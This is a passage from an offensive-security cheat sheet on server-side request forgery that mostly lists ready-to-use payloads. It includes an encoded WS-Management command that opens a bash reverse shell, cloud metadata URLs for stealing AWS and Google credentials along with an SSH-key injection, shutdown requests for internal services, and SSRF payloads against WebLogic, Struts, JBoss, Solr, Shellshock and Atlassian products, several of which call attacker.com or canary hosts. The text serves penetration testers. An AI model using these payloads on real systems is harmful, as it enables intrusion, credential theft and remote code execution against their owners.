0%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a") - self.end_headers() - -httpd = HTTPServer(('0.0.0.0', 443), MainHandler) -httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True) -httpd.serve_forever() -``` - -```python -from flask import Flask, redirect -from urllib.parse import quote -app = Flask(__name__) - -@app.route('/') -def root(): - return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301) - -if __name__ == "__main__": - app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) -``` - -### Abusing DNS Rebidding + TLS Session ID/Session ticket - -Requirements: - -* **SSRF** -* **Outbound TLS sessions** -* **Stuff on local ports** - -Attack: - -1. Ask the user/bot **access** a **domain** controlled by the **attacker** -2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon) -3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**. -4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain. -5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example) -6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**. - -Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\ -To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\ -For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference) - -### Automated DNS Rebidding - -**``**[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine. - -Check out also the publicly running server in [http://rebind.it/singularity.html](http://rebind.it/singularity.html) - -## Exploitation in Cloud - -### Abusing SSRF in AWS EC2 environment - -#### 169.254.169.254 - Metadata Address - -**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)). - -The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**. - -Sending a GET requests to the following endpoint will **dump a list of roles** that are attached to the current EC2 instance: - -``` -http://169.254.169.254/latest/meta-data/iam/security-credentials/ -``` - -If you want to access your S3 bucket you would normally hard-code your API keys into your application. Hard-coding clear text passwords is a bad idea. This is why you can assign your EC2 instance a role which can be used to access your S3 bucket. These credentials are automatically rotated by AWS and can be access thought the metadata API. - -Once you get a list of roles attached to the EC2 instance you can **dump their credentials** by making a GET requests to the following URL: - -``` -http://169.254.169.254/latest/meta-data/iam/security-credentials/ -``` - -As an example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws) - -The response should look something like this: - -``` -{ - "Code" : "Success", - "LastUpdated" : "2019-08-03T20:42:03Z", - "Type" : "AWS-HMAC", - "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ", - "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR", - "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJHMEUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDXeDE+3eKIq4wMI9v//////////ARAAGgw4OTUzODQ4MTU4MzAiDEF3/SQw0vAVzHKrgCq3A84uZvhGAswagrFjgrWAvIj4cJd6eI5Gcje09FyfRPmALKJymfQgpTQN9TtC/sBhIyICfni8JJvGesQZGi9c0ZFIWqdlmM/2rdZ6GaqcZY9V+0LspbwiDK0FUjrRcquBVswSlxWs8Tr0Uhpka20mUQOBhovmVyXNzyTQUQnBE9qgFLbYY+t86yUXmXMXxGPd4sWuLgkoCF2iPlMkgUwZq8hZvoiVf7TVQU32sgstKN7ozJiJcgTBpa6/batscGBtNpck4LOvHzNwwYv/FuVkpC70bPhqNXVxMEcpwt4s7RkHHowdFlNpnPpm57dfAYwZwoklWJdvtqFQ0tZHusZ65vJqyk5cZ8f3P/Cf7UlzoZPsIsarWcgfiDvkQliU9fY6Brt7jyjrF5h7oJbW/LUS4R9SDp+qKMtUY2JmLZRovsW4GfhfLJWv7wrW81QZVC8rBKLzWFRTLRkhlTFsS7A5JscuKoORyDxGQq/pGRsE30effdS9G1xNmzKwn45/V0XsilhTE7pOJGGopuLfBo5KD46hVS9v1iBuvxrVxsHFz7mnD/GKiwi1hbFAKEvypagZ28qEJaarNvAdi2QOowjuOX6gU6tAFrfFVBb6ZTI4btIjHNNoT0TFW5iYD0dkD+csqC4nTVpnAG/FFBk+CAHdy5Gh/aBISO7OQF9xKJSXkd+Syf62pg5XiMseL3n2+2+IWdDgKwhZYxeVlMbX88QYX3P9sX+OWHWidAVgTQhZw3xJ+VBV33EKgJ4b8Bk6mgo0kiB1hnoN0KX8RXr1axpYnJv2GHb8h/det89iwpyk77+8YcEvRc+DGTLIcUIxDoirgck9bpP3EBXfs=", - "Expiration" : "2019-08-04T03:16:50Z" -} -``` - -You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network. - -To take advantage of the new credentials, you will need to crate a new AWS profile like this one: - -``` -[profilename] -aws_access_key_id = ASIA6GG7PSQG4TCGYYOU -aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC -aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw= -``` - -Notice the **aws\_session\_token**, this is indispensable for the profile to work.\ -Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) (read that post for further information).\ -Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](http://169.254.169.254/user-data) - -[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges - -### SSRF in AWS ECS (Container Service) credentials - -**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**. - -If you access _**http://169.254.170.2/v2/credentials/\**_ you will find the credentials of the ECS machine. But first you need to **find the \_\**\_ . To find the \ you need to read the **environ** variable **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** inside the machine.\ -You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_\ -\_\_The mentioned http address should give you the **AccessKey, SecretKey and token**. - -```bash -curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O - -``` - -### SSRF URL for AWS Elastic Beanstalk - -We retrieve the `accountId` and `region` from the API. - -``` -http://169.254.169.254/latest/dynamic/instance-identity/document -http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role -``` - -We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API. - -``` -http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role -``` - -![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL) - -Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. - -### SSRF URL for Google Cloud - -Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” - -``` -http://169.254.169.254/computeMetadata/v1/ -http://metadata.google.internal/computeMetadata/v1/ -http://metadata/computeMetadata/v1/ -http://metadata.google.internal/computeMetadata/v1/instance/hostname -http://metadata.google.internal/computeMetadata/v1/instance/id -http://metadata.google.internal/computeMetadata/v1/project/project-id -``` - -Google allows recursive pulls - -``` -http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true -``` - -Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) - -``` -http://metadata.google.internal/computeMetadata/v1beta1/ -http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true -``` - -Interesting files to pull out: - -* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json) -* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token) -* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json) - -### Add an SSH key - -Extract the token - -``` -http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json -``` - -Check the scope of the token - -``` -$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA { - "issued_to": "101302079XXXXX", - "audience": "10130207XXXXX", - "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", - "expires_in": 2443, - "access_type": "offline" -} -``` - -Now push the SSH key. - -``` -curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" --H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" --H "Content-Type: application/json" ---data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' -``` - -### SSRF URL for Digital Ocean - -Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/) - -``` -curl http://169.254.169.254/metadata/v1/id -http://169.254.169.254/metadata/v1.json -http://169.254.169.254/metadata/v1/ -http://169.254.169.254/metadata/v1/id -http://169.254.169.254/metadata/v1/user-data -http://169.254.169.254/metadata/v1/hostname -http://169.254.169.254/metadata/v1/region -http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request: -curl http://169.254.169.254/metadata/v1.json | jq -``` - -### SSRF URL for Packetcloud - -Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) - -### SSRF URL for Azure - -Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/) - -[http://169.254.169.254/metadata/v1/maintenance](http://169.254.169.254/metadata/v1/maintenance) - -Update Apr 2017, Azure has more support; requires the header “Metadata: true” [`https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service) - -``` -http://169.254.169.254/metadata/instance?api-version=2017-04-02 -http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text -``` - -### SSRF URL for OpenStack/RackSpace - -(header required? unknown) - -``` -http://169.254.169.254/openstack -``` - -### SSRF URL for HP Helion - -(header required? unknown) - -``` -http://169.254.169.254/2009-04-04/meta-data/ -``` - -### SSRF URL for Oracle Cloud - -``` -http://192.0.0.192/latest/ -http://192.0.0.192/latest/user-data/ -http://192.0.0.192/latest/meta-data/ -http://192.0.0.192/latest/attributes/ -``` - -### SSRF URL for Alibaba - -``` -http://100.100.100.200/latest/meta-data/ -http://100.100.100.200/latest/meta-data/instance-id -http://100.100.100.200/latest/meta-data/image-id -``` - -### SSRF URL for Kubernetes ETCD - -Can contain API keys and internal ip and ports - -``` -curl -L http://127.0.0.1:2379/version -curl http://127.0.0.1:2379/v2/keys/?recursive=true -``` - -### SSRF URL for Docker - -``` -http://127.0.0.1:2375/v1.24/containers/jsonSimple example -docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash -bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json -bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json -``` - -### SSRF URL for Rancher - -``` -curl http://rancher-metadata// -``` - -## Blind SSRF - -The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities. - -### Time based SSRF - -**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist) - -## Detect SSRF - -You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests (GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...). - -* [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) -* [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - -## To practice - -{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %} - -## Vulnerable Platforms - -This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/) - -## Elasticsearch - -**Commonly bound port: 9200** - -When Elasticsearch is deployed internally, it usually does not require authentication. - -If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200: - -```http -/_cluster/health -/_cat/indices -/_cat/health -``` - -If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path: - -Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below: - -```http -/_shutdown -/_cluster/nodes/_master/_shutdown -/_cluster/nodes/_shutdown -/_cluster/nodes/_all/_shutdown -``` - -## Weblogic - -**Commonly bound ports: 80, 443 (SSL), 7001, 8888** - -**SSRF Canary: UDDI Explorer (CVE-2014-4210)** - -```http -POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1 -Host: target.com -Content-Length: 137 -Content-Type: application/x-www-form-urlencoded - -operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search -``` - -This also works via GET: - -```bash -http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search -``` - -This endpoint is also vulnerable to CRLF injection: - -``` -GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0 -Host: vuln.weblogic -Accept-Encoding: gzip, deflate -Accept: */* -Accept-Language: en -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 -Connection: close -``` - -Will result in the following request: - -``` -root@mail:~# nc -lvp 4000 -Listening on [0.0.0.0] (family 0, port 4000) -Connection from example.com 43111 received! -POST /exp HTTP/1.11 -X-CLRF: Injected HTTP/1.1 -Content-Type: text/xml; charset=UTF-8 -soapAction: "" -Content-Length: 418 -User-Agent: Java1.6.0_24 -Host: attacker.com:4000 -Accept: text/html, image/gif, image/jpeg, */*; q=.2 -Connection: Keep-Alive - -sdf -``` - -**SSRF Canary: CVE-2020-14883** - -Taken from [here](https://forum.90sec.com/t/topic/1412). - -Linux: - -```http -POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 -Host: vulnerablehost:7001 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9 -Connection: close -Content-Type: application/x-www-form-urlencoded -Content-Length: 117 - -_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml") -``` - -Windows: - -```http -POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 -Host: vulnerablehost:7001 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9 -Connection: close -Content-Type: application/x-www-form-urlencoded -Content-Length: 117 - -_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml") -``` - -## Hashicorp Consul - -**Commonly bound ports: 8500, 8501 (SSL)** - -Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html). - -## Shellshock - -**Commonly bound ports: 80, 443 (SSL), 8080** - -In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying: - -Short list of CGI paths to test: - -[Gist containing paths](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4). - -**SSRF Canary: Shellshock via User Agent** - -```bash -User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY -``` - -## Apache Druid - -**Commonly bound ports: 80, 8080, 8888, 8082** - -See the API reference for Apache Druid [here](https://druid.apache.org/docs/latest/operations/api-reference.html). - -If you can view the status code, check the following paths to see if they return a 200 status code: - -```bash -/status/selfDiscovered/status -/druid/coordinator/v1/leader -/druid/coordinator/v1/metadata/datasources -/druid/indexer/v1/taskStatus -``` - -Shutdown tasks, requires you to guess task IDs or the datasource name: - -```bash -/druid/indexer/v1/task/{taskId}/shutdown -/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks -``` - -Shutdown supervisors on Apache Druid Overlords: - -```bash -/druid/indexer/v1/supervisor/terminateAll -/druid/indexer/v1/supervisor/{supervisorId}/shutdown -``` - -## Apache Solr - -**Commonly bound port: 8983** - -**SSRF Canary: Shards Parameter** - -> To add to what shubham is saying - scanning for solr is relatively easy. There is a shards= param which allows you to bounce SSRF to SSRF to verify you are hitting a solr instance blindly. -> -> — Хавиж Наффи 🥕 (@nnwakelam) [January 13, 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref\_src=twsrc%5Etfw) - -Taken from [here](https://github.com/veracode-research/solr-injection). - -```bash -/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}} -/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json -/xxx?q=aaa%26shards=http://SSRF_CANARY/solr -/xxx?q=aaa&shards=http://SSRF_CANARY/solr -``` - -**SSRF Canary: Solr XXE (2017)** - -[Apache Solr 7.0.1 XXE (Packetstorm)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html) - -```bash -/solr/gettingstarted/select?q={!xmlparser v='' -/xxx?q={!type=xmlparser v=""} -``` - -**RCE via dataImportHandler** - -[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler) - -## PeopleSoft - -**Commonly bound ports: 80,443 (SSL)** - -Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce). - -**SSRF Canary: XXE #1** - -```http -POST /PSIGW/HttpListeningConnector HTTP/1.1 -Host: website.com -Content-Type: application/xml -... - - - -]> - - &x; - - - - - - - - - - - - - - - - - - your_message_content]]> - - - - -``` - -**SSRF Canary: XXE #2** - -```http -POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 -Host: website.com -Content-Type: application/xml -... - - -``` - -## Apache Struts - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/). - -**SSRF Canary: Struts2-016**: - -Append this to the end of every internal endpoint/URL you know of: - -```http -?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} -``` - -## JBoss - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/). - -**SSRF Canary: Deploy WAR from URL** - -```bash -/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war -``` - -## Confluence - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -**SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)** - -```bash -/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/ -``` - -**SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)** - -[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) - -```bash -/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY -``` - -## Jira - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -**SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)** - -[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) - -```bash -/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY -``` - -**SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)** - -[Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793) - -```bash -/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com -``` - -## Other Atlassian Products - -**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** - -**SSRF Canary: iconUriServlet (CVE-2017-9506)**: - -* Bamboo < 6.0.0 -* Bitbucket < 4.14.4 -* Crowd < 2.11.2 -* Crucible < 4.3.2 -* Fisheye < 4.3.2 - -[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) - -```bash -/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY -``` - -## OpenTSDB - -**Commonly bound port: 4242** - -[OpenTSDB Remote Code Execution](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html) - -**SSRF Canary: curl via RCE** - -```bash 